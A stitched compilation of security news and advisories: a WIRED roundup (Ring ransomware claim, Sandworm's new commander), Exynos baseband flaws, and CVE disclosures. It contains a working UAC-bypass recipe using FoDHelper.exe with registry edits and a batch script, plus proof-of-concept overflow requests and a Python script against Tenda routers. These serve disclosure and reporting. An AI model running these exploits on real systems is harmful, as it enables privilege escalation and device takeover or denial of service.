Plus: A SpaceX supplier ransom, critical vulnerabilities in dozens of Android phones, and more.

What’s more controversial than a popular surveillance camera maker that has an uncomfortably cozy relationship with American police? When ransomware hackers claim to have breached that company—Amazon-owned camera maker Ring—stolen its data, and Ring responds by denying the breach.

But we’ll get to that.

Five years ago, police in the Netherlands caught members of Russia’s GRU military intelligence red-handed as they tried to hack the Organization for the Prohibition of Chemical Weapons in The Hague. The team had parked a rental car outside the organization’s building and hid a Wi-Fi snooping antenna in its trunk. Within the GRU group was Evgenii Serebriakov, who was caught with further Wi-Fi hacking tools in his backpack.

Since then, surprisingly, Serebriakov has only risen in status. This week, Western intelligence sources told WIRED that Serebriakov is now the new leader of one of the world’s most aggressive hacking units. Serebriakov took over Sandworm, which is responsible for some of the worst cyberattacks in history, in the spring of 2022. His elevation to the senior role, experts say, shows how small the pool of skilled nation-state hackers is likely to be and demonstrates Serebriakov’s value to Russia.

Nowhere on the internet is free from threats—and that includes LinkedIn. This week we looked at how spies, scammers, and hackers from Iran, North Korea, Russia, and China are using the professional network to scout and approach intelligence targets. In addition, LinkedIn is plagued with thousands of suspicious accounts; it removed hundreds from WIRED’s profile when we reported them.

The Western clampdown on TikTok is continuing—this week the UK joined the US, Belgium, Canada, and the European Union in banning the social media app from being used on government devices. But in the US, Senator Mark Warner is trying to pass legislation, in the guise of the bipartisan Restrict Act, that will allow officials to ban apps and services from six “hostile” nations: China, Russia, North Korea, Iran, Cuba, and Venezuela. We sat down with Warner and asked about the plans.

A WIRED analysis of “cybercrime” cases across the US shows how vague and wide-ranging the term can be. Without a clear and universal definition of cybercrime, human rights and civil liberties issues may expand globally. Speaking of criminals, scammers are getting better at using voice deepfakes to con people. And ransomware gangs are sinking to a new deplorable low. As more and more companies and organizations refuse to pay ransoms, criminal gangs are increasingly using extortion as leverage: they are now releasing photos stolen from cancer patients and sensitive student records. 

But wait, there's more. Each week, we round up the security news we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

ALPHV, a prolific group of hackers who extort companies with ransomware and leak their stolen data, said earlier this week that it had breached security camera maker Ring and threatened to dump the company’s data online if it doesn’t pay. “There’s always an option to let us leak your data …” the hackers wrote in a message to Ring on their leak site. Ring has so far responded with a denial, telling Vice’s Motherboard, “We currently have no indications of a ransomware event,” but it says it’s aware of a third-party vendor that has experienced one. That vendor, Ring says, doesn’t have access to any customer records. 

Meanwhile, ALPHV, which has previously used its BlackCat ransomware to target companies like Bandai Namco, Swissport, and hospital firm Lehigh Valley Health Network, stands by its claim to have breached Ring itself, not a third-party vendor. A member of the malware research group VX-Underground shared with WIRED screenshots of a conversation with an ALPHV representative who says that it’s still in “negotiations” with Ring.

Amid the ongoing ransomware epidemic, it’s no surprise that Ring isn’t alone in facing extortion problems. So too is Maximum Industries, a supplier of rocket parts for Elon Musk’s SpaceX. The hackers, a well-known ransomware gang known as LockBit, taunted Musk on their website, threatening to sell the stolen information to the highest bidder if Maximum doesn’t pay by their March 20 deadline. “I would say we were lucky if Space-X contractors were more talkative. But I think this material will find its buyer as soon as possible,” the hackers wrote. “Elon Musk we will help you sell your drawings to other manufacturers.”

Google’s Project Zero, its security research team devoted to finding unknown vulnerabilities in widely used tech products, warned Thursday that it had discovered severe hackable flaws in Samsung chips used in dozens of Android devices. In total, the researchers found 18 distinct vulnerabilities in Samsung’s Exynos modems for smartphones, but they say that four of them are particularly critical and would allow a hacker to “remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim’s phone number.” Project Zero only rarely publishes information on unpatched vulnerabilities. But it says that it gave Samsung 90 days to fix the flaws, and it hasn’t yet. A bit of public shaming, perhaps, might spur Samsung to move faster to protect Google’s users from an insidious form of attack.

Since 2017, the cryptocurrency “mixer” service ChipMixer quietly grew into a powerhouse of cryptocurrency money laundering, taking in users’ coins, mixing them with others and then sending them back to obscure the money’s trail across blockchains. In the process, the Department of Justice says it laundered $3 billion worth of criminal funds, including ransomware payments, North Korean hackers’ stolen loot, and even profits from the sale of child sexual exploitation materials. Now, in a bust carried out by multiple European law enforcement agencies and coordinated by Europol as well as the FBI and DHS, ChipMixer has been taken offline and its infrastructure seized. The site’s alleged creator, 49-year-old Vietnamese national Minh Quốc Nguyễn, remains out of reach: He’s been charged with money laundering only in absentia. 

But the most intriguing result of the case may have more to do with the meltdown of the now notorious cryptocurrency exchange FTX: A portion of FTX’s funds that were stolen in the midst of its bankruptcy proceedings in November were funneled into ChipMixer. Seizing the servers of that mixing service may well foil the FTX thieves’ attempt to evade tracing and help solve one of the central mysteries of that high-profile heist.

Only in the cryptocurrency world, where thefts of more than half a billion dollars now occur multiple times a year, does the stealing of $200 million merit the lowest spot on a news roundup. Early this week, the distributed trading protocol Euler Finance lost nearly $200 million in cryptocurrency to hackers who found a vulnerability in its code. At first, Euler, the company behind that protocol, offered to let the hackers keep $20 million if they returned the rest of the funds. But after that offer was ignored—in fact, the hackers have sent the funds to the Tornado Cash mixing service in the hopes of covering their tracks—the firm has announced a $1 million bounty on the hackers’ heads.

Security News This Week: Ring Is in a Standoff With Hackers

This write up is an overview of how Microsoft's attempts to manage elevated access to executables via registry entries has added over complexity that still allows for escalation.

    Hi @ll,with Windows 2000, Microsoft virtualised the [HKEY_CLASSES_ROOT] registrybranch: what was just an alias for [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]before became the overlay of [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] and[HKEY_CURRENT_USER\Software\Classes] with the latter having precedence:<https://msdn.microsoft.com/en-us/library/ms724498.aspx>Note: while [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] is writable only by      (privileged) administrators, [HKEY_CURRENT_USER\Software\Classes]      is writable by the (current) unprivileged user.With Windows Vista they introduced the "security theatre" called"User Account Control" (a far better name is "qUACkery"):<https://blogs.msdn.microsoft.com/uac/2005/12/08/user-account-control/>| User Account Protection was the preliminary name for a core security| component of Windows Vista. The component has now been officially named| User Account Control (UAC).The qUACkery sort of lobotomises administrator accounts and splits theirbrain^Waccess token: the "shell", i.e. EXPLORER.exe, and all programs runfrom it use a restricted access token without administrative privileges.For the (not so few) programs which but need administrative privileges,Microsoft introduced a "kill switch" in the application manifest:<https://msdn.microsoft.com/en-us/library/aa374191.aspx><https://msdn.microsoft.com/en-us/library/bb756929.aspx>| <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">|    <security>|       <requestedPrivileges>|          <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />|       </requestedPrivileges>|    </security>| </trustInfo>With this loop^Wwormhole, the virtualised [HKEY_CLASSES_ROOT] introducedwith Windows 2000 became but a can of worms: in STANDARD installations ofWindows, applications running with administrative privileges, i.e. anintegrity level above "Medium", now evaluate registry settings (COM CLSIDs,ProgIDs, URL protocols, ...) which are under control of the unprivilegeduser.<https://msdn.microsoft.com/en-us/library/ms724498.aspx>| If an application is run with administrator rights and User Account| Control is disabled, the COM runtime ignores per-user COM configuration| and accesses only per-machine COM configuration.<https://msdn.microsoft.com/en-us/library/bb756926.aspx>| Beginning with Windows Vista® and Windows Server® 2008, if the| integrity level of a process is higher than Medium, the COM runtime| ignores per-user COM configuration and accesses only per-machine| COM configuration. This action reduces the surface area for elevation| of privilege attacks, preventing a process with standard user privileges| from configuring a COM object with arbitrary code and having this code| called from an elevated process.OOPS: COM CLSIDs have been removed from the can of worms.But what about ProgIDs and URL protocols?<https://msdn.microsoft.com/en-us/library/cc144152.aspx>Demonstration:~~~~~~~~~~~~~~1) Start the command processor in the user account created during   Windows setup;2) Execute the "Feature on Demand" helper application FoDHelper.exe   (which requires administrative privileges, but elevates SILENTLY),   then close the "Immersive Control Panel" window it opened;3) Add the following registry entries to replace the application run   by the elevated FoDHelper.exe from "Immersive Control Panel" to   "Windows Command Processor" (or an arbitrary other one):   [HKEY_CURRENT_USER\Software\Classes\qUACkery\Shell\Open\Command]   @="C:\\Windows\\System32\\Cmd.exe"   [HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer]   @="qUACkery"4) Execute FoDHelper.exe again;5) Remove the registry entries created in step 3.If you prefer a batch script:--- quackery.cmdREG.exe ADD "HKEY_CURRENT_USER\Software\Classes\qUACkery\Shell\Open\Command" /VE /T REG_SZ /D "%COMSPEC%" /FREG.exe ADD "HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer" /VE /T REG_SZ /D "qUACkery" /FFoDHelper.exeREG.exe DELETE "HKEY_CURRENT_USER\Software\Classes\MS-Settings" /FREG.exe DELETE "HKEY_CURRENT_USER\Software\Classes\qUACkery" /F--- EOF ---OOPS: Windows Defender blocks the execution of FoDHelper.exeSpoiler: installation of another anti-virus, for example McAfee,         Bitdefender, Eset, Sophos, Avira, AVG/Avast, TrendMicro,         deactivates Windows Defender and lets FoDHelper.com run         an arbitrary application elevated, without UAC prompt.stay tuned, and far away from the eternally vulnerable crap oozing out of RedmondStefan KanthakPS: finding the applications which call the ProgIDs/URL protocols    ms-settings-airplanemode, ms-settings-bluetooth, ms-settings-cellular,    ms-settings-connectabledevices, ms-settings-displays-topology,    ms-settings-emailandaccounts, ms-settings-language, ms-settings-location,    ms-settings-lock, ms-settings-mobilehotspot, ms-settings-notifications,    ms-settings-power, ms-settings-privacy, ms-settings-proximity,    ms-settings-screenrotation, ms-settings-wifi, ms-settings-workplace    is left as an exercise to the reader.PPS: for all these URL protocols, the wise guys from Redmond added the     following registry entries to ease their exploitation:     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\ms-settings]     "WarnOnOpen"=dword:00000000     ...     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\ms-settings-workplace]     "WarnOnOpen"=dword:00000000

Microsoft User Account Control Nuances

Google is calling attention to a set of severe security flaws in Samsung's Exynos chips, some of which could be exploited remotely to completely compromise a phone without requiring any user interaction.
The 18 zero-day vulnerabilities affect a wide range of Android smartphones from Samsung, Vivo, Google, wearables using the Exynos W920 chipset, and vehicles equipped with the Exynos Auto T5123

Mobile Security / Firmware

Google is calling attention to a set of severe security flaws in Samsung's Exynos chips, some of which could be exploited remotely to completely compromise a phone without requiring any user interaction.

The 18 zero-day vulnerabilities affect a wide range of Android smartphones from Samsung, Vivo, Google, wearables using the Exynos W920 chipset, and vehicles equipped with the Exynos Auto T5123 chipset.

Four of the 18 flaws make it possible for a threat actor to achieve internet-to-baseband remote code execution, Google Project Zero, which reported the issues in late 2022 and early 2023, said.

"\[The\] four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim's phone number," Tim Willis, head of Google Project Zero, said.

In doing so, a threat actor could gain entrenched access to cellular information passing in and out of the targeted device. Additional details about the bugs have been withheld.

The attacks might sound prohibitive to execute, but, to the contrary, they are well within reach of skilled attackers, who can quickly devise an operational exploit to breach affected devices "silently and remotely."

The remaining 14 flaws are said to be not as severe, as it necessitates a rogue mobile network insider or an attacker with local access to the device.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

While Pixel 6 and 7 handsets have already received a fix as part of March 2023 security updates, patches for other devices are expected to vary depending on the manufacturer's timeline.

Until then, users are recommended to switch off Wi-Fi calling and Voice over LTE (VoLTE) in their device settings to "remove the exploitation risk of these vulnerabilities."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Uncovers 18 Severe Security Vulnerabilities in Samsung Exynos Chips

Any request send to a Netgear Nighthawk Wifi6 Router (RAX30)'s web service containing a “Content-Type” of “multipartboundary=” will result in the request body being written to “/tmp/mulipartFile” on the device itself. A sufficiently large file will cause device resources to be exhausted, resulting in the device becoming unusable until it is rebooted.

tenable.cloudflareaccess.com

drupal9.tenable.com

Sign in with:

Okta ・ okta

CVE-2023-28338: Sign in ・ Cloudflare Access

Evgenii Serebriakov now runs the most aggressive hacking team of Russia’s GRU military spy agency. To Western intelligence, he’s a familiar face.

For years, the hacking unit within Russia's GRU military intelligence agency known as Sandworm has carried out some of the worst cyberattacks in history—blackouts, fake ransomware, data-destroying worms—from behind a carefully maintained veil of anonymity. But after half a decade of the spy agency's botched operations, blown cover stories, and international indictments, perhaps it's no surprise that pulling the mask off the man leading that highly destructive hacking group today reveals a familiar face.

The passport Evgenii Serebriakov used to enter the Netherlands in 2018.

Photograph: Department of Justice

The commander of Sandworm, the notorious division of the agency's hacking forces responsible for many of the GRU's most aggressive campaigns of cyberwar and sabotage, is now an official named Evgenii Serebriakov, according to sources from a Western intelligence service who spoke to WIRED on the condition of anonymity. If that name rings a bell, it may be because Serebriakov was indicted, along with six other GRU agents, after being caught in the midst of a close-range cyberespionage operation in the Netherlands in 2018 that targeted the Organization for the Prohibition of Chemical Weapons in the Hague.

In that foiled operation, Dutch law enforcement didn't just identify and arrest Serebriakov and his team, who were part of a different GRU unit generally known as Fancy Bear or APT28. They also seized Serebriakov’s backpack full of technical equipment, as well as his laptop and other hacking devices in his team’s rental car. As a result, Dutch and US investigators were able to piece together Serebriakov's travels and past operations stretching back years and, given his newer role, now know in unusual detail the career history of a rising GRU official.

According to the intelligence service sources, Serebriakov was placed in charge of Sandworm in the spring of 2022 after serving as deputy commander of APT28, and now holds the rank of colonel. Christo Grozev, the lead Russia-focused investigator for open source intelligence outlet Bellingcat, has also noted Serebriakov's rise: Around 2020, Grozev says, Serebriakov began receiving phone calls from GRU generals who, in the agency's strict hierarchy, only speak to higher-level officials. Grozev, who says he bought the phone data from a Russian black market source, says he also saw the GRU agent's number appear in the phone records of another powerful military unit focused on counterintelligence. "I realized he must be in a command position," says Grozev. "He can't just be a regular hacker anymore."

The fact that Serebriakov appears to have attained that position despite having been previously identified and indicted in the failed Netherlands operation suggests that he must have significant value to the GRU—that he's “apparently too good to dump,” Grozev adds.

Serebriakov's new position leading Sandworm—officially GRU Unit 74455 but also known by the nicknames Voodoo Bear and Iridium—puts him in charge of a group of hackers who are perhaps the world's most prolific practitioners of cyberwar. (They've also dabbled in espionage and disinformation campaigns.) Since 2015, Sandworm has led the Russian government's unprecedented campaign of cyberattacks on Ukraine: It penetrated electric utilities in western Ukraine and Kyiv to cause the first- and second-ever blackouts triggered by hackers and targeted Ukrainian government agencies, banks, and media with countless data-destructive malware operations. In 2017, Sandworm released NotPetya, a piece of self-replicating code that spread to networks worldwide and inflicted a record $10 billion in damage. Sandworm then went on to sabotage the 2018 Winter Olympics in Korea and attack TV broadcasters in the nation of Georgia in 2019, a shocking record of reckless hacking.

With Russia's full-scale invasion of Ukraine a year ago, the GRU's most aggressive hacking unit, now under Serebriakov's leadership, has refocused its efforts on that country. From its headquarters in a tower in the Moscow suburb of Khimki, it has launched new volleys of data-destroying malware, attempted to cause a third blackout—which the Ukrainian government says it prevented—and bombarded Ukrainian and Polish organizations with a fake ransomware campaign known as Prestige.

Serebriakov's pre-Sandworm hacking career was no less brazen. When he was captured along with the six other GRU agents in the Netherlands in 2018, US prosecutors say, he had in his backpack a Wi-Fi Pineapple, a book-sized device designed to spoof Wi-Fi networks and trick victims into connecting to it instead of the intended Wi-Fi hot spot, then carry out man-in-the-middle attacks that intercept or alter the victim's traffic. Serebriakov's team had also parked a rented car outside the Organization for the Prohibition of Chemical Weapons building with an antenna for Wi-Fi hacking hidden in the trunk. The team was likely targeting staffers of the OPCW who were investigating Russia's use of the Novichok nerve agent in the GRU's attempted assassination of defector Sergei Skripal.

Serebriakov posing with a Russian athlete at the Summer Olympics in Rio de Janeiro in 2016.

Photograph: Department of Justice

When investigators examined that confiscated Wi-Fi hacking equipment, they found evidence of a long list of Wi-Fi networks it had connected to previously, essentially mapping out the travels of Serebriakov and his colleagues to carry out previous hacking operations. The hackers, it seemed, had targeted officials at the 2016 Summer Olympics in Rio de Janeiro, from which more than 100 Russian athletes had been banned for performance-enhancing drug use, as well as attendees of a conference in Lausanne, Switzerland, focused on anti-doping efforts in athletics.

Exactly why Dutch authorities released Serebriakov and his fellow spies rather than criminally charge them—or extradite them to the US, where they face an indictment for hacking crimes—has never been explained, and the Dutch MIVD defense intelligence service didn't respond to WIRED's questions about it at the time.

That the figure at the helm of Sandworm today is someone previously identified in that very publicly blown Netherlands operation may demonstrate Serebriakov's value to the GRU: According to the intelligence service sources, he's regarded as having good connections to the security research community and strong technical skills. As for the fiasco of the GRU's Netherlands mission, the intelligence sources say that was blamed on the agents escorting him and his APT28 colleagues, not the hackers themselves. And in some cases, for the GRU, an indictment only bolsters an agent's reputation for boldness and risk-taking. “For the Kremlin, it may be ‘great, you’ve made a splash, built the myth, bolstered our reputation as these techno-raiders, good on you,’” says Gavin Wilde, a former official at the US National Security Agency and the White House National Security Council who now serves as a fellow at the Carnegie Endowment for International Peace.

But Serebriakov's reappearance also indicates that relatively few people serve as key players in high-profile state-sponsored hacking operations, says John Hultquist, the head of threat intelligence at cybersecurity firm Mandiant. Hultquist was part of the group of researchers who initially discovered and named Sandworm, and he has closely tracked the unit for years. “This is someone from a notorious close-access operation, and then he shows up as the leader of another organization we know very well,” says Hultquist, using the term _close-access_ to refer to Serebriakov's short-range Wi-Fi hacking tactics in the Netherlands. “To a certain extent, it demonstrates how small this world is that we’re trying to keep tabs on.”

“The same individuals show up again and again—and I mean the people with the actual hands on the keyboard,” Hultquist adds. “It speaks to the limited number of people in the field. We're still living in a world where talent is apparently limited to the point where we know the adversaries intimately.”

This Is the New Leader of Russia's Infamous Sandworm Hacking Unit

Tenda AX3 V16.03.12.11 was discovered to contain a stack overflow via the shareSpeed parameter at /goform/WifiGuestSet.

Permalink

**Tenda AX3 V16.03.12.11 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-3476.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiGuestSet，The user passes in shareSpeed, and then the program will use strcpy to copy shareSpeed to shared\_up\_speed. It is worth noting that there is no size check, which leads to stack overflow vulnerabilities.

**Poc**

import requests

url \= "http://192.168.0.1/goform/WifiGuestSet"

shareSpeed \= "a" \* 0x2000

r \= requests.post(url, data\={'shareSpeed': shareSpeed})
print(r.content)

You can see the router crash, and finally you can write exp to get root shell

CVE-2023-27239: CVE/readme.md at main · yjzy00001/CVE

Tenda V15V1.0 V15.11.0.14(1521_3190_1058) was discovered to contain a buffer overflow vulnerability via the picName parameter in the formDelWewifiPi function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

Permalink

Cannot retrieve contributors at this time

**Tenda V15V1.0 found a buffer overflow vulnerability in the "formDelWewifiPic" function****Vendor:**

​ Tenda

**Product:**

​ V15EV1.0

**Vendor Homepage:**

​ https://www.tenda.com.cn/

**Firmware:**

​ https://www.tenda.com.cn/download/detail-2722.html

**Version:**

​ V15.11.0.14(1521\_3190\_1058)

**Vulnerability details**

The vulnerability is in the "formDelWewifiPic" function in the /bin/httpd file

​ 

"picName" receives the transmitted parameters, does not verify its length. causes a buffer overflow vulnerability due to the use of sprintf()

**POC**

POST /goform/delWewifiPic HTTP/1.1
Host: 192.168.75.201
Content-Length: 250
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.75.201
Referer: http://192.168.75.201/quickset/quickset.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: W15E\_user=
Connection: close

picName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Start httpd using qemu

 

DOS caused by sending request

CVE-2023-27065: vuln/formDelWewifiPic.md at main · didi-zhiyuan/vuln

Tenda V15V1.0 V15.11.0.14(1521_3190_1058) was discovered to contain a buffer overflow vulnerability via the wifiFilterListRemark parameter in the modifyWifiFilterRules function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

Permalink

Cannot retrieve contributors at this time

**Tenda V15V1.0 found a buffer overflow vulnerability in the "modifyWifiFilterRules" function****Vendor:**

​ Tenda

**Product:**

​ V15EV1.0

**Vendor Homepage:**

​ https://www.tenda.com.cn/

**Firmware:**

​ https://www.tenda.com.cn/download/detail-2722.html

**Version:**

​ V15.11.0.14(1521\_3190\_1058)

**Vulnerability details**

The vulnerability is in the "formWifiFilterRulesModify -> modifyWifiFilterRules" function in the /bin/httpd file

​  ​ 

"pRuleMac","pRuleDesc" receives the transmitted parameters, does not verify its length. causes a buffer overflow vulnerability due to the use of sprintf()

**POC**

POST /goform/modifyWifiFilterRules HTTP/1.1
Host: 192.168.75.201
Content-Length: 250
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.75.201
Referer: http://192.168.75.201/quickset/quickset.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: W15E\_user=
Connection: close

wifiFilterListRemark=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Start httpd using qemu

DOS caused by sending request

And overwrite the return address, an execute arbitrary commands by constructing EXP

CVE-2023-27061: vuln/formWifiFilterRulesModify.md at main · didi-zhiyuan/vuln

An improper neutralization of directives in dynamically evaluated code vulnerability in the WiFi Battery embedded web server in versions L90/U70 and L92/U92 can be used to gain administrative access to the WiFi communication module. An authenticated user, having access to both the medical device WiFi network (such as a biomedical engineering staff member) and the specific B.Braun Battery Pack SP with WiFi web server credentials, could get administrative (root) access on the infusion pump communication module. This could be used as a vector to start further attacks

  
Coordinated vulnerability disclosure program

**B. Braun vulnerability disclosure statements **

We welcome vulnerability reports from researchers, industry groups, CERTs,

partners, and any other source and will give full credit on our website once the

submission has been accepted, validated and published by our product security

team.

                 

**Vulnerability Coordination Assistance****Questions or concerns about security?**

If you believe you have identified a potential security vulnerability in one of our products or services, please follow the coordinated disclosure process and fill out the form.

Click here

**B. Braun Security Bulletins**

B. Braun Product Security Bulletins contains of product-specific vulnerability updates and security-related information. Our bulletins will list all known vulnerabilities for each product, the status and all recommended customer actions such as fixes or patches or other mitigation strategies. Revised bulletins are posted regularly with the latest available information.

**11/2022 B. Braun Statement on Cybersecurity Vulnerability with OpenSSL 3.0.X**  
Friday, November 4, 2022

**Read more**

**03/2022 B. Braun Statement regarding the Palo Alto Networks cybersecurity report concerning infusion devices**

Friday, March 25, 2022  
**Read more**

**12/2021 B. Braun Statement on Cybersecurity Vulnerability in Apache Log4j**

Tuesday, December 14, 2021  
**Read more**

**11/2021 B. Braun Statement on Cybersecurity Vulnerability with Infra:Halt**

Friday, November 19, 2021

**Read more**

**11/2021 B. Braun Statement on Cybersecurity Vulnerability with Nucleus:13**

Wednesday, November 17, 2021

**Read more**

**05/2021 SpaceCom, Battery Pack SP with WiFi, Data module compactplus - multiple vulnerabilities**

Friday, May 14, 2021

**Read more**

**04/2021: B. Braun Information concerning Name:Wreck**

Monday, April 19, 2021

**Read more**

**02/2021 OnlineSuite WiBu CodeMeter multiple vulnerabilities**

Wednesday, February 24, 2021

**Read more**

**12/2020 B. Braun Statement on Cybersecurity Vulnerability with Amnesia:33**

Friday, December 18, 2020

**Read more**

**10/2020 SpaceCom, Battery Pack SP with WiFi, Data module compactplus - multiple vulnerabilities**

Monday, October 26, 2020

**Read more**

**10/2020 Online Suite - multiple vulnerabilities**

Monday, October 26, 2020

**Read more**

CVE-2023-0888: B. Braun Product Security

NETGEAR Nighthawk WiFi6 Router prior to V1.0.10.94 contains a format string vulnerability in a SOAP service that could allow an attacker to execute arbitrary code on the device.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

